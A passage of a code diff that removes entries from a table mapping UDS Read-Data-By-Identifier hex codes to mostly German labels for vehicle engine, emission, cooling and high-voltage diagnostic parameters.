-UDS_RDBI.dataIdentifiers[0xb016] = "Zyklusflag LS Heizung Vor Kat" # or hsv LS Heizung vor Kat -UDS_RDBI.dataIdentifiers[0xb017] = "hsv2 LS Heizung vor Kat" -UDS_RDBI.dataIdentifiers[0xb018] = "Zyklusflag LS Heizung Vor Kat Endstufe" # or hsve LS Heizung vor Kat Endstufe -UDS_RDBI.dataIdentifiers[0xb019] = "hsve2 LS Heizung vor Kat Endstufe" -UDS_RDBI.dataIdentifiers[0xb020] = "Tiefentladeschutz" # or iclsu LSU Auswerte IC -UDS_RDBI.dataIdentifiers[0xb021] = "iclsu2 LSU Auswerte IC" -UDS_RDBI.dataIdentifiers[0xb022] = "lash LS Alterung hinter Kat (DE" # or Zyklusflag LS Alterung Hinter Hauptkat -UDS_RDBI.dataIdentifiers[0xb023] = "lash2 LS Alterung hinter Kat (DE" -UDS_RDBI.dataIdentifiers[0xb024] = "lshv LS Vertauschung Hinter Kat (DE" -UDS_RDBI.dataIdentifiers[0xb025] = "lsvv LS Vertauschung Vor Kat" -UDS_RDBI.dataIdentifiers[0xb026] = "ulsu LS an Luft" -UDS_RDBI.dataIdentifiers[0xb027] = "ulsu2 LS an Luft" -UDS_RDBI.dataIdentifiers[0xb028] = "Zyklusflag LS Hinter Hauptkat" # or lsh LS hinter Kat (DE -UDS_RDBI.dataIdentifiers[0xb029] = "lsh2 LS hinter Kat (DE" -UDS_RDBI.dataIdentifiers[0xb030] = "lsuia LS Leitung an Bond IA" -UDS_RDBI.dataIdentifiers[0xb031] = "lsuia2 LS Leitung an Bond IA" -UDS_RDBI.dataIdentifiers[0xb032] = "lsuip Leitungssunterbrechung an IP" -UDS_RDBI.dataIdentifiers[0xb033] = "lsuip2 Leitungssunterbrechung an IP" -UDS_RDBI.dataIdentifiers[0xb034] = "lsuks Kurzschluss Sondenleitung" -UDS_RDBI.dataIdentifiers[0xb035] = "lsuks2 Kurzschluss Sondenleitung" -UDS_RDBI.dataIdentifiers[0xb036] = "lsuun LS Leitung an Bond UN" -UDS_RDBI.dataIdentifiers[0xb037] = "lsuun2 LS Leitung an Bond UN" -UDS_RDBI.dataIdentifiers[0xb038] = "lsuvm LS Leitung an Bond VM" -UDS_RDBI.dataIdentifiers[0xb039] = "lsuvm2 LS Leitung an Bond VM" -UDS_RDBI.dataIdentifiers[0xb040] = "lsv LS vor Kat" -UDS_RDBI.dataIdentifiers[0xb041] = "lsv2 LS vor Kat" -UDS_RDBI.dataIdentifiers[0xb042] = "lsve Elektrischer Fehler Vor Kat" -UDS_RDBI.dataIdentifiers[0xb043] = "lsve2 Elektrischer Fehler Vor Kat" -UDS_RDBI.dataIdentifiers[0xb044] = "pllsu Plausibilitaet der LSU" # or Zyklusflag Plausibilitaet der LSU -UDS_RDBI.dataIdentifiers[0xb045] = "pllsu2 Plausibilitaet der LSU" -UDS_RDBI.dataIdentifiers[0xb046] = "Zyklusflag NW Einlass Zuordnung NW ZU KW" # or nwkwe Zuordnung Einlass NW zu KW -UDS_RDBI.dataIdentifiers[0xb047] = "nwkwe2 Zuordnung Einlass NW zu KW" -UDS_RDBI.dataIdentifiers[0xb048] = "nwkwa Zuordnung Auslass NW zu KW" -UDS_RDBI.dataIdentifiers[0xb049] = "nwkwa2 Zuordnung Auslass NW zu KW" -UDS_RDBI.dataIdentifiers[0xb050] = "Zyklusflag NW Einlass Verriegelungsposition Start" # or nwvpe Verriegelungsposition Einlass waehrend Start -UDS_RDBI.dataIdentifiers[0xb051] = "nwvpe2 Verriegelungsposition Einlass waehrend Start" -UDS_RDBI.dataIdentifiers[0xb052] = "nwvpa Verriegelungsposition Auslass waehrend Start" -UDS_RDBI.dataIdentifiers[0xb053] = "nwvpa2 Verriegelungsposition Auslass waehrend Start" -UDS_RDBI.dataIdentifiers[0xb054] = "Zyklusflag Sekundaerluftsystem" # or sls Sekundaerluftsystem -UDS_RDBI.dataIdentifiers[0xb055] = "sls2 Sekundaerluftsystem" -UDS_RDBI.dataIdentifiers[0xb056] = "Zyklusflag Sekundaerluftventil" # or slv Sekundaerventil -UDS_RDBI.dataIdentifiers[0xb057] = "slv2 Sekundaerventil" -UDS_RDBI.dataIdentifiers[0xb058] = "Zyklusflag Sekundaerluftpumpe Endstufe" # or slpe Sekundaerpumpe Endstufe -UDS_RDBI.dataIdentifiers[0xb059] = "slve Sekundaerventil Endstufe" # or Zyklusflag Sekundaerluftventil Endstufe -UDS_RDBI.dataIdentifiers[0xb060] = "Zyklusflag Absperrventil Aktivkohlefilter" -UDS_RDBI.dataIdentifiers[0xb061] = "Zyklusflag Tankentlueftlungssystem Feinleck" -UDS_RDBI.dataIdentifiers[0xb063] = "Zyklusflag Tankentlueftlungssystem Kleinstleck" -UDS_RDBI.dataIdentifiers[0xb100] = "Readiness PID01" -UDS_RDBI.dataIdentifiers[0xb101] = "iness PID41" -UDS_RDBI.dataIdentifiers[0xb200] = "HFA Product Identification Function ID" -UDS_RDBI.dataIdentifiers[0xb500] = "Counter Motorstarts" -UDS_RDBI.dataIdentifiers[0xb501] = "Allgemeiner Nenner" -UDS_RDBI.dataIdentifiers[0xb502] = "Katalysator rechts" -UDS_RDBI.dataIdentifiers[0xb503] = "Katalysator rechts" -UDS_RDBI.dataIdentifiers[0xb504] = "Katalysator links" -UDS_RDBI.dataIdentifiers[0xb505] = "Katalysator links" -UDS_RDBI.dataIdentifiers[0xb506] = "EVAP" # or Tankdichtigkeitsdiagnose 05mm -UDS_RDBI.dataIdentifiers[0xb507] = "EVAP" # or Tankdichtigkeitsdiagnose 05mm -UDS_RDBI.dataIdentifiers[0xb508] = "Sekundaerluftsystem" -UDS_RDBI.dataIdentifiers[0xb509] = "Sekundaerluftsystem" -UDS_RDBI.dataIdentifiers[0xb510] = "Sonde vorKat Mode9 rechts" -UDS_RDBI.dataIdentifiers[0xb511] = "Sonde vorKat Mode9 rechts" -UDS_RDBI.dataIdentifiers[0xb512] = "Sonde vorKat Mode9 links" -UDS_RDBI.dataIdentifiers[0xb513] = "Sonde vorKat Mode9 links" -UDS_RDBI.dataIdentifiers[0xb514] = "AGR oder NoWe Verstellung Mode9" -UDS_RDBI.dataIdentifiers[0xb515] = "AGR oder NoWe Verstellung Mode9" -UDS_RDBI.dataIdentifiers[0xb51a] = "OBD RBM Werte als Hex-Dump" -UDS_RDBI.dataIdentifiers[0xb51b] = "Erweiterte RBM Werte als Hex-Dump" -UDS_RDBI.dataIdentifiers[0xb520] = "Tankdichtigkeitsdiagnose 1 mm" -UDS_RDBI.dataIdentifiers[0xb521] = "Tankdichtigkeitsdiagnose 1 mm" -UDS_RDBI.dataIdentifiers[0xb522] = "Tankdichtigkeitsdiagnose Grobleck" -UDS_RDBI.dataIdentifiers[0xb523] = "Tankdichtigkeitsdiagnose Grobleck" -UDS_RDBI.dataIdentifiers[0xb524] = "Tankentlueftungsprinzipdiagnose" -UDS_RDBI.dataIdentifiers[0xb525] = "Tankentlueftungsprinzipdiagnose" -UDS_RDBI.dataIdentifiers[0xb526] = "Sonde hinter Kat rechts" -UDS_RDBI.dataIdentifiers[0xb527] = "Sonde hinter Kat rechts" -UDS_RDBI.dataIdentifiers[0xb528] = "Sonde hinterKat links" -UDS_RDBI.dataIdentifiers[0xb529] = "Sonde hinterKat links" -UDS_RDBI.dataIdentifiers[0xb530] = "Sondenheizung vor Kat rechts" -UDS_RDBI.dataIdentifiers[0xb531] = "Sondenheizung vor Kat rechts" -UDS_RDBI.dataIdentifiers[0xb532] = "Sondenheizung vor Kat links" -UDS_RDBI.dataIdentifiers[0xb533] = "Sondenheizung vor Kat links" -UDS_RDBI.dataIdentifiers[0xb534] = "Sondenheizung hinterKat rechts" -UDS_RDBI.dataIdentifiers[0xb535] = "Sondenheizung hinterKat rechts" -UDS_RDBI.dataIdentifiers[0xb536] = "Sondenheizung hinter Kat links" -UDS_RDBI.dataIdentifiers[0xb537] = "Sondenheizung hinter Kat links" -UDS_RDBI.dataIdentifiers[0xb538] = "Kurbelgehaeuse Entlueftung" -UDS_RDBI.dataIdentifiers[0xb539] = "Kurbelgehaeuse Entlueftung" -UDS_RDBI.dataIdentifiers[0xb540] = "Motortemperatursensor haengt kalt" -UDS_RDBI.dataIdentifiers[0xb541] = "Motortemperatursensor haengt kalt" -UDS_RDBI.dataIdentifiers[0xb542] = "Motortemperatursensor haengt warm" -UDS_RDBI.dataIdentifiers[0xb543] = "Motortemperatursensor haengt warm" -UDS_RDBI.dataIdentifiers[0xb544] = "Temperatursensor PremAir" -UDS_RDBI.dataIdentifiers[0xb545] = "Temperatursensor PremAir" -UDS_RDBI.dataIdentifiers[0xb546] = "Ansauglufttemperatursensor" -UDS_RDBI.dataIdentifiers[0xb547] = "Ansauglufttemperatursensor" -UDS_RDBI.dataIdentifiers[0xb548] = "Umgebungslufttemperatursensor" -UDS_RDBI.dataIdentifiers[0xb549] = "Umgebungslufttemperatursensor" -UDS_RDBI.dataIdentifiers[0xb550] = "Umgebungsluftdrucksensor" -UDS_RDBI.dataIdentifiers[0xb551] = "Umgebungsluftdrucksensor" -UDS_RDBI.dataIdentifiers[0xb552] = "Saugrohrdrucksensor" -UDS_RDBI.dataIdentifiers[0xb553] = "Saugrohrdrucksensor" -UDS_RDBI.dataIdentifiers[0xb554] = "Ladedrucksensor" -UDS_RDBI.dataIdentifiers[0xb555] = "NennerLadedrucksensor" -UDS_RDBI.dataIdentifiers[0xb556] = "Heissfilmluftmassensensor" -UDS_RDBI.dataIdentifiers[0xb557] = "Heissfilmluftmassensensor" -UDS_RDBI.dataIdentifiers[0xb558] = "Tankdrucksensor" -UDS_RDBI.dataIdentifiers[0xb559] = "Tankdrucksensor" -UDS_RDBI.dataIdentifiers[0xb560] = "Aktivkohleabsperrventil" -UDS_RDBI.dataIdentifiers[0xb561] = "Aktivkohleabsperrventil" -UDS_RDBI.dataIdentifiers[0xb562] = "Drosselklappe Lage Pruefung" -UDS_RDBI.dataIdentifiers[0xb563] = "Drosselklappe Lage Pruefung" -UDS_RDBI.dataIdentifiers[0xb564] = "Drosselklappe Bereich Pruefung" -UDS_RDBI.dataIdentifiers[0xb565] = "Drosselklappe Bereich Pruefung" -UDS_RDBI.dataIdentifiers[0xb566] = "Versatz NoWe Auslass rechts" -UDS_RDBI.dataIdentifiers[0xb567] = "Versatz NoWe Auslass rechts" -UDS_RDBI.dataIdentifiers[0xb568] = "Versatz NoWe Auslass links" -UDS_RDBI.dataIdentifiers[0xb569] = "Versatz NoWe Auslass links" -UDS_RDBI.dataIdentifiers[0xb570] = "Versatz NoWe Einlass rechts" -UDS_RDBI.dataIdentifiers[0xb571] = "Versatz NoWe Einlass rechts" -UDS_RDBI.dataIdentifiers[0xb572] = "Versatz NoWe Einlass links" -UDS_RDBI.dataIdentifiers[0xb573] = "Versatz NoWe Einlass links" -UDS_RDBI.dataIdentifiers[0xb574] = "Fahrzeuggeschwindigkeit" -UDS_RDBI.dataIdentifiers[0xb575] = "Fahrzeuggeschwindigkeit" -UDS_RDBI.dataIdentifiers[0xb576] = "Leerlaufregelung" -UDS_RDBI.dataIdentifiers[0xb577] = "Leerlaufregelung" -UDS_RDBI.dataIdentifiers[0xb578] = "Sonde hinterKat Schwingungspruefung rechts" -UDS_RDBI.dataIdentifiers[0xb579] = "Sonde hinterKat Schwingungspruefung rechts" -UDS_RDBI.dataIdentifiers[0xb580] = "Sonde hinterKat Schwingungspruefung links" -UDS_RDBI.dataIdentifiers[0xb581] = "Sonde hinterKat Schwingungspruefung links" -UDS_RDBI.dataIdentifiers[0xc000] = "fuer Warmstartleitung" # or Korrekturwert Anfettung Start -UDS_RDBI.dataIdentifiers[0xc001] = "Sensor High Range" # or Reset Zaehler Warmstartleitung -UDS_RDBI.dataIdentifiers[0xc002] = "Sensor Medium Range" -UDS_RDBI.dataIdentifiers[0xc003] = "Sensor Low Range" -UDS_RDBI.dataIdentifiers[0xc004] = "Max Block Resistance" -UDS_RDBI.dataIdentifiers[0xc005] = "Contactor Closure Inhibit" -UDS_RDBI.dataIdentifiers[0xc006] = "Pack Voltage" -UDS_RDBI.dataIdentifiers[0xc007] = "Pack Voltage (Source)" -UDS_RDBI.dataIdentifiers[0xc008] = "BUS voltage" -UDS_RDBI.dataIdentifiers[0xc009] = "BUS voltage (Source)" -UDS_RDBI.dataIdentifiers[0xc00a] = "Abgleich Energmanag Trip Computer perHour" -UDS_RDBI.dataIdentifiers[0xc00b] = "Abgleich Energmanag Crash Reset" -UDS_RDBI.dataIdentifiers[0xc010] = "Precharge Fail Penalty Time" -UDS_RDBI.dataIdentifiers[0xc011] = "Korrekturwert Hybrid Ladezustand Modus Quick Charge" -UDS_RDBI.dataIdentifiers[0xc012] = "HV Contactor Command" -UDS_RDBI.dataIdentifiers[0xc013] = "Produktionsmodus Interlock Freigabe" # or HV Isolation Fault Diagnostic Stat -UDS_RDBI.dataIdentifiers[0xc014] = "Present Reasons Contactors Opened " -UDS_RDBI.dataIdentifiers[0xc015] = "Contactor 12 volt feed" -UDS_RDBI.dataIdentifiers[0xc016] = "Pump 12 volt feed" -UDS_RDBI.dataIdentifiers[0xc017] = "Produktionsmodus E Maschine neutral Freigabe" # or HV Isolation Fault Diagnostic Stat -UDS_RDBI.dataIdentifiers[0xc018] = "Service Disconnect" -UDS_RDBI.dataIdentifiers[0xc019] = "HVIL" -UDS_RDBI.dataIdentifiers[0xc020] = "connector inputs 12v" -UDS_RDBI.dataIdentifiers[0xc021] = "Kuehlaggregat Chillerventil CO2 Befuellmodus" -UDS_RDBI.dataIdentifiers[0xc022] = "Abgasklappe obere Regelbereichsgrenze" -UDS_RDBI.dataIdentifiers[0xc023] = "Abgasklappe untere Regelbereichsgrenze" -UDS_RDBI.dataIdentifiers[0xc100] = "Laufzeit mit Motorlauf" -UDS_RDBI.dataIdentifiers[0xc101] = "Fahrt" -UDS_RDBI.dataIdentifiers[0xc102] = "Leerlauf" -UDS_RDBI.dataIdentifiers[0xc103] = "Laufzeit ohne Motorlauf" -UDS_RDBI.dataIdentifiers[0xc104] = "Startvorgaenge" -UDS_RDBI.dataIdentifiers[0xc105] = "Qualitaetsfaktor" -UDS_RDBI.dataIdentifiers[0xc106] = "Oelreset Anzahl" -UDS_RDBI.dataIdentifiers[0xc107] = "Nachfuellungen Anzahl" -UDS_RDBI.dataIdentifiers[0xc108] = "Fahrzeuguebergabe durchgefuehrt" -UDS_RDBI.dataIdentifiers[0xc109] = "Fahrzeuguebergabe Offset Strecke" -UDS_RDBI.dataIdentifiers[0xc110] = "Tag letzter Motoraus" -UDS_RDBI.dataIdentifiers[0xc111] = "Tag letzter Motorlauf" -UDS_RDBI.dataIdentifiers[0xc112] = "Oelverduennung" -UDS_RDBI.dataIdentifiers[0xc120] = "" -UDS_RDBI.dataIdentifiers[0xc121] = "Restlaufstrecke Anzeige" -UDS_RDBI.dataIdentifiers[0xc122] = "Restlaufzeit" -UDS_RDBI.dataIdentifiers[0xc123] = "Laufzeit mit Motor" -UDS_RDBI.dataIdentifiers[0xc124] = "Fahrt" -UDS_RDBI.dataIdentifiers[0xc125] = "Leerlauf" -UDS_RDBI.dataIdentifiers[0xc126] = "Startvorgaenge" -UDS_RDBI.dataIdentifiers[0xc127] = "Qualitaetsfaktor" -UDS_RDBI.dataIdentifiers[0xc128] = "gesamt" -UDS_RDBI.dataIdentifiers[0xc129] = "korr" -UDS_RDBI.dataIdentifiers[0xc130] = "Kilometerklasse" -UDS_RDBI.dataIdentifiers[0xc131] = "" -UDS_RDBI.dataIdentifiers[0xc132] = "Service Datum" -UDS_RDBI.dataIdentifiers[0xc133] = "Oelverduennung" -UDS_RDBI.dataIdentifiers[0xc134] = "vor Wartung" -UDS_RDBI.dataIdentifiers[0xc135] = "Datenuebergabe" -UDS_RDBI.dataIdentifiers[0xc136] = "Datenuebergabe zuletzt bestaetigt" -UDS_RDBI.dataIdentifiers[0xc137] = "Datenuebergabe Backup zuletzt bestaetigt" -UDS_RDBI.dataIdentifiers[0xc140] = "Ladestrom Tarifumschaltung MobisFr Zeitvektor" -UDS_RDBI.dataIdentifiers[0xc141] = "Ladestrom Tarifumschaltung MobisFr Kostenvektor" -UDS_RDBI.dataIdentifiers[0xc142] = "Ladestrom Tarifumschaltung MobisFr Leistungsbegrenzungsvektor" -UDS_RDBI.dataIdentifiers[0xc143] = "Ladestrom Tarifumschaltung SamstagSonntag Zeitvektor" -UDS_RDBI.dataIdentifiers[0xc144] = "Ladestrom Tarifumschaltung SamstagSonntag Kostenvektor" -UDS_RDBI.dataIdentifiers[0xc145] = "Ladestrom Tarifumschaltung SamstagSonntag Leistungsbegrenzungsvektor" -UDS_RDBI.dataIdentifiers[0xc146] = "Ladestrom Tarifumschaltung Aktivierungsstatus" -UDS_RDBI.dataIdentifiers[0xc147] = "Ladestrom Tarifumschaltung OrtsbasierterStromtarif" -UDS_RDBI.dataIdentifiers[0xc148] = "Kraftstoffverbrauch Lebenszeit Gesamtkilometerstand Nackommastellen" -UDS_RDBI.dataIdentifiers[0xc149] = "Kraftstoffverbrauch Lebenszeit Gesamtkilometerstand" -UDS_RDBI.dataIdentifiers[0xc150] = "Kraftstoffvolumen Lebenszeit Nachkommastellen" -UDS_RDBI.dataIdentifiers[0xc151] = "Kraftstoffvolumen Lebenszeit" -UDS_RDBI.dataIdentifiers[0xc27a] = "Fahrzeuguebergabe durchgefuehrt ASSYST Fahrzeuguebergabe durchgefuehrt" -UDS_RDBI.dataIdentifiers[0xc406] = "Ladestrom Tarifumschaltung MobisFr Zeitvektor" -UDS_RDBI.dataIdentifiers[0xc407] = "Ladestrom Tarifumschaltung MobisFr Kostenvektor" -UDS_RDBI.dataIdentifiers[0xc408] = "Ladestrom Tarifumschaltung MobisFr Leistungsbegrenzungsvektor" -UDS_RDBI.dataIdentifiers[0xc409] = "Ladestrom Tarifumschaltung SamstagSonntag Zeitvektor" -UDS_RDBI.dataIdentifiers[0xc40a] = "Ladestrom Tarifumschaltung SamstagSonntag Kostenvektor" -UDS_RDBI.dataIdentifiers[0xc40b] = "Ladestrom Tarifumschaltung SamstagSonntag Leistungsbegrenzungsvektor" -UDS_RDBI.dataIdentifiers[0xc40c] = "Ladestrom Tarifumschaltung Aktivierungsstatus" -UDS_RDBI.dataIdentifiers[0xc800] = "EgfPosn agIdle" # or TAC LrndIdlePosn -UDS_RDBI.dataIdentifiers[0xc801] = "TAC BreakAway Actv Cntr" # or EgfBreakAwy ctrAcv -UDS_RDBI.dataIdentifiers[0xc802] = "TAC Clng DrvCycCntr" # or EgfClng ctrDrvCyc -UDS_RDBI.dataIdentifiers[0xc803] = "throttle actuator control learned lower position" -UDS_RDBI.dataIdentifiers[0xc804] = "TAC LrndUpPosn" -UDS_RDBI.dataIdentifiers[0xc805] = "EgfPosnLrn ctrDrvCyc" # or throttle actuator control position learning driving cycle counter -UDS_RDBI.dataIdentifiers[0xc806] = "EgrfPosn agIdle" # or angle EGR flap idle -UDS_RDBI.dataIdentifiers[0xc807] = "EgrfPosnCtl agRngLo" # or angle EGR flap lower block -UDS_RDBI.dataIdentifiers[0xc808] = "angle EGR flap upper block" # or EgrfPosnCtl agRngHi -UDS_RDBI.dataIdentifiers[0xc809] = "ctr EgrFBreakAwyAcv" # or ctr EgrFlapBreakAwyAcv -UDS_RDBI.dataIdentifiers[0xc80a] = "ctr EgrFPosnLrnDrvCyc" # or ctr EgrFlapPosnLrnDrvCyc -UDS_RDBI.dataIdentifiers[0xc80b] = "ctr EgrFClngDrvCyc" # or ctr EgrFlapClngDrvCyc -UDS_RDBI.dataIdentifiers[0xc80c] = "LEGR PDiff Adap Offs" -UDS_RDBI.dataIdentifiers[0xcf00] = "EOL Enable Disable sensors" -UDS_RDBI.dataIdentifiers[0xcf01] = "Internal Software Version Information" -UDS_RDBI.dataIdentifiers[0xcf02] = "EOL BLDC Driver Status" -UDS_RDBI.dataIdentifiers[0xcf03] = "Pressure sensor output Read Response Parameters Pressure sensor output" -UDS_RDBI.dataIdentifiers[0xcf04] = "EOL FLS and FPS status" -UDS_RDBI.dataIdentifiers[0xcf10] = "EOL Identification" -UDS_RDBI.dataIdentifiers[0xcf50] = "Write SBC Register" -UDS_RDBI.dataIdentifiers[0xd000] = "Anfettung Start Nachstart" -UDS_RDBI.dataIdentifiers[0xd001] = "Klemmenschaltung Read IO Control" # or Klemmenschaltung, SH F LED1 1 Read IO Control -UDS_RDBI.dataIdentifiers[0xd002] = "SH F LED2 Read IO Control" # or Zentralverriegelung Read IO Control -UDS_RDBI.dataIdentifiers[0xd003] = "DSM Notpfad" # or Regelschwelle Lambda nach KAT (DE, SH F OUT Read IO Control, DSM Notpfad Read IO Control, Lambda Regelschwelle nach Kat -UDS_RDBI.dataIdentifiers[0xd004] = "Lastschlagdaempfung Korrektur" # or Steering Wheel Angle -UDS_RDBI.dataIdentifiers[0xd005] = "Laufruhe Empfindlichkeit Korrektur" # or Empfindlichkeit der Laufruhebewertung -UDS_RDBI.dataIdentifiers[0xd006] = "Batterietrennschalter Read IO Control" -UDS_RDBI.dataIdentifiers[0xd007] = "Ignition Switch" # or Suchbeleuchtung Taster Read IO Control, Leerlaufsolldrehzahl Mit Fahrstufe -UDS_RDBI.dataIdentifiers[0xd008] = "Entfall Sicherungsstifte" # or Leistungsgewicht Korrektur, Korrekturfaktor Leistungsgewicht, Entfall Sicherungsstifte Read IO Control -UDS_RDBI.dataIdentifiers[0xd009] = "MKV Korrektur" -UDS_RDBI.dataIdentifiers[0xd010] = "Fahrertuerkontakplausibilitaet" # or ROZ Korrektur -UDS_RDBI.dataIdentifiers[0xd011] = "SH BF LED1 Read IO Control" -UDS_RDBI.dataIdentifiers[0xd012] = "SH BF LED2 Read IO Control" -UDS_RDBI.dataIdentifiers[0xd013] = "SH BF OUT Read IO Control" -UDS_RDBI.dataIdentifiers[0xd014] = "Haptisches Fahrpedalmodul" -UDS_RDBI.dataIdentifiers[0xd015] = "Kuehlmittelpumpe HVBatteriekuehlung" -UDS_RDBI.dataIdentifiers[0xd016] = "Kuehlmittel Drehschieberventil BMS" -UDS_RDBI.dataIdentifiers[0xd017] = "Hochvolt Auslenkung Ladezustand" -UDS_RDBI.dataIdentifiers[0xd018] = "Anforderung Stromloser Zustand" -UDS_RDBI.dataIdentifiers[0xd019] = "SAM Bordnetzumschaltung" -UDS_RDBI.dataIdentifiers[0xd020] = "SH DPLUS Read IO Control" -UDS_RDBI.dataIdentifiers[0xd021] = "Check Engine Lamp" # or Check Engine, Systemwarnlampe -UDS_RDBI.dataIdentifiers[0xd022] = "Entladestrompuls El Kaeltemittelverdichter" # or Drehschieber des Waermemanagements -UDS_RDBI.dataIdentifiers[0xd023] = "SOC Vorgabe" # or Drosselklappenwinkel -UDS_RDBI.dataIdentifiers[0xd024] = "Einspritzventil HWZyl1" # or Ausblendmuster Einspritzventile -UDS_RDBI.dataIdentifiers[0xd025] = "Kuehlaggregat Chillerventil CO2" # or Gemischanpassung -UDS_RDBI.dataIdentifiers[0xd026] = "Abgasklappe Otto rechts Read IO Control" # or Abgasklappe Otto rechts, Erregerstrombegrenzung -UDS_RDBI.dataIdentifiers[0xd027] = "Regelspannung" -UDS_RDBI.dataIdentifiers[0xd028] = "Abgasklappe Otto links" # or Rampenzeit -UDS_RDBI.dataIdentifiers[0xd029] = "Drehzahlschwelle" -UDS_RDBI.dataIdentifiers[0xd030] = "Heizabsperrventil" -UDS_RDBI.dataIdentifiers[0xd031] = "Kuehlerjalousie Fahrsoftware" # or Kuehlerjalousie Testervorgabe, Kuehlerjalousie LIN Read Kuehlerjalousie -UDS_RDBI.dataIdentifiers[0xd032] = "Kuehlmittelpumpe Getriebeoelkuehlung" # or Lambdaregelung -UDS_RDBI.dataIdentifiers[0xd033] = "Kuehlmittelpumpe LIN Read Kuehlmittelpumpe" -UDS_RDBI.dataIdentifiers[0xd034] = "Heizkreislauf HV Batterie Absperrventil" -UDS_RDBI.dataIdentifiers[0xd035] = "Nachlaufverlaengerung FBS" -UDS_RDBI.dataIdentifiers[0xd036] = "Nockenwellensteller Auslass" -UDS_RDBI.dataIdentifiers[0xd037] = "Anforderung Schubbetrieb" -UDS_RDBI.dataIdentifiers[0xd038] = "Kuehlmittelpumpe Bypass" -UDS_RDBI.dataIdentifiers[0xd039] = "X1 HotLoop Pump" # or Luefter LIN Read Luefter -UDS_RDBI.dataIdentifiers[0xd03a] = "Luefter PWM" -UDS_RDBI.dataIdentifiers[0xd040] = "X1 ColdLoop Pump" # or Kuehlmittel Drehschieberventil LIN Read Kuehlmittel Drehschieberventil -UDS_RDBI.dataIdentifiers[0xd041] = "X1 HVLoop Pump" # or Sondenheizung normierte Leistung Nach KAT -UDS_RDBI.dataIdentifiers[0xd042] = "X1 BatLoop Pump" # or Kuehlmittel Drehschieberventil 2 -UDS_RDBI.dataIdentifiers[0xd043] = "Fahrstufe Vorgabe" # or X1 HotLoop Valve1, Sondenheizung Vor KAT -UDS_RDBI.dataIdentifiers[0xd044] = "X1 HotLoop Valve2" -UDS_RDBI.dataIdentifiers[0xd045] = "X1 HotLoop BatHeaterValve" # or Saugrohrumschaltung -UDS_RDBI.dataIdentifiers[0xd046] = "X1 HotLoop BypassValve" -UDS_RDBI.dataIdentifiers[0xd047] = "X1 ColdLoop BypassValve" -UDS_RDBI.dataIdentifiers[0xd048] = "Tumbleklappe" # or X1 BatLoop Valve -UDS_RDBI.dataIdentifiers[0xd049] = "X1 FrontFan" # or Zuendwinkelverstellung -UDS_RDBI.dataIdentifiers[0xd050] = "X1 EngOilFan PWM" -UDS_RDBI.dataIdentifiers[0xd051] = "X1 EngBayFan PWM" # or Einspritzzeit Rechts Array -UDS_RDBI.dataIdentifiers[0xd052] = "X1 HVSideFan PWM" -UDS_RDBI.dataIdentifiers[0xd055] = "NT Absperrventil" -UDS_RDBI.dataIdentifiers[0xd061] = "Anhebung der Leerlaufdrehzahl" -UDS_RDBI.dataIdentifiers[0xd062] = "Wastegate Read Wastegate" -UDS_RDBI.dataIdentifiers[0xd068] = "Schubumluftventil" -UDS_RDBI.dataIdentifiers[0xd06f] = "Ladeluftkuehlmittelpumpe kontinuierlich" -UDS_RDBI.dataIdentifiers[0xd073] = "Motoroelpumpe Ventil" # or Ventil Motoroelpumpe -UDS_RDBI.dataIdentifiers[0xd082] = "Momentenvorgabe Verbr. motor Hybrid" -UDS_RDBI.dataIdentifiers[0xd084] = "DMTL Tanksystem - Pumpe" -UDS_RDBI.dataIdentifiers[0xd085] = "DMTL Tanksystem - Ventil" -UDS_RDBI.dataIdentifiers[0xd086] = "DMTL Tanksystem - Heizung" -UDS_RDBI.dataIdentifiers[0xd088] = "Energmanag Hochvolt Auslenkung Ladezustand" -UDS_RDBI.dataIdentifiers[0xd089] = "Entladestrompuls Elektromaschine" -UDS_RDBI.dataIdentifiers[0xd090] = "Entladestrompuls DCDC Umsetzer" -UDS_RDBI.dataIdentifiers[0xd092] = "Energmanag Anforderung Stromloser Zustand" # or Anforderung an Energiemanagement - stromloser Zustand -UDS_RDBI.dataIdentifiers[0xd093] = "Regenerierventil LPV" -UDS_RDBI.dataIdentifiers[0xd100] = "DDPRelayControl" # or Feste Widerstandsvorgabe Hebelgeber primaer sekundaer -UDS_RDBI.dataIdentifiers[0xd101] = "FixedVoltageMode" -UDS_RDBI.dataIdentifiers[0xd102] = "DDPStartFunction" # or Klemme87 Read Klemme87 -UDS_RDBI.dataIdentifiers[0xd103] = "Stop Start Relay" -UDS_RDBI.dataIdentifiers[0xd123] = "Bremskreis Unterdruckpumpe" -UDS_RDBI.dataIdentifiers[0xd124] = "Luefter Heck" -UDS_RDBI.dataIdentifiers[0xd125] = "Klimakompressor" -UDS_RDBI.dataIdentifiers[0xd126] = "Kuehlkreislauf Absperrventil" -UDS_RDBI.dataIdentifiers[0xd201] = "Kuehlmittelpumpe NT2 15W BMS" -UDS_RDBI.dataIdentifiers[0xd202] = "Kuehlaggregat Umschaltventil" -UDS_RDBI.dataIdentifiers[0xd204] = "Kuehlmittelpumpe Plugin Hybrid Read Kuehlmittelpumpe Plugin Hybrid" -UDS_RDBI.dataIdentifiers[0xd205] = "Kuehlaggregat Expansionsventil" -UDS_RDBI.dataIdentifiers[0xd206] = "Kuehlmittel Drehschieberventil BMS" -UDS_RDBI.dataIdentifiers[0xd208] = "Kuehlermaskenjalousie" -UDS_RDBI.dataIdentifiers[0xd209] = "Kuehlmittelpumpe AMG LIN PRES LIN CP CAC2TransActlSpd" -UDS_RDBI.dataIdentifiers[0xd20a] = "PTC Zuheizer Plugin Hybrid" -UDS_RDBI.dataIdentifiers[0xd211] = "verbaute Steuergeraete Ist Chassis1 Lesen" # or verbaute Steuergeraete Ist Chassis1 CGW -UDS_RDBI.dataIdentifiers[0xd212] = "verbaute Steuergeraete Ist Chassis2 CGW" # or verbaute Steuergeraete Ist Chassis2 Lesen -UDS_RDBI.dataIdentifiers[0xd213] = "verbaute Steuergeraete Ist Diagnostic Lesen" # or verbaute Steuergeraete Ist Diagnostic CGW -UDS_RDBI.dataIdentifiers[0xd800] = "EGFP SetVal Diag EGFP SetVal Diag" # or EgfPosn perc -UDS_RDBI.dataIdentifiers[0xd801] = "EgrfPosn perc" # or perc EgrfAgTrnsp -UDS_RDBI.dataIdentifiers[0xd802] = "ICF SetVal" -UDS_RDBI.dataIdentifiers[0xd900] = "VTA HW Ausgaenge" -UDS_RDBI.dataIdentifiers[0xdb06] = "IOC Kraftstoffpumpe Control PWM Vorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdb10] = "IOC Kraftstoffpumpe Control Druckvorgabe ohne Schwellen" -UDS_RDBI.dataIdentifiers[0xdb14] = "IOC Kraftstoffpumpe Control Volumenvorgabe ohne Schwellen" 